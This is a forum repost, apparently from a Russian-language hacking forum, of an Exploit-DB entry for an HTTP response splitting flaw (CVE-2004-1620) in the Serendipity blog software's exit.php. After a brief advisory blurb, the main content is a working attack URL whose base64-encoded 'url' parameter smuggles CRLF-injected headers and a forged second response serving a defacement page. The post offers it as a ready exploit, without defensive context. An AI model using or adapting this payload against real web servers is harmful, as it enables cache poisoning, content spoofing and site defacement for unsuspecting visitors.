Exploit S9Y Serendipity 0.x - 'exit.php' HTTP Response Splitting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24697
Проверка EDB
  1. Пройдено
Автор
CHAOTICEVIL
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2004-1620
Дата публикации
2004-10-21
S9Y Serendipity 0.x - 'exit.php' HTTP Response Splitting
Код:
source: https://www.securityfocus.com/bid/11497/info

Serendipity is reported prone to an HTTP response splitting vulnerability.

A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or interpreted.

This issue is identified in Serendipity 0.7-beta4 and prior.

http://www.example.com/serendipity/exit.php?url=DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb
250ZW50LUxlbmd0aDogMA0KDQpIVFRQLzEuMCAyMDAgT0sNCkNvbnRlbnQtTGVuZ3RoOiAyMQ0KQ
29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCg0KPGh0bWw%2bKmRlZmFjZWQqPC9odG1sPg%3d%3d
 
Источник
www.exploit-db.com

Похожие темы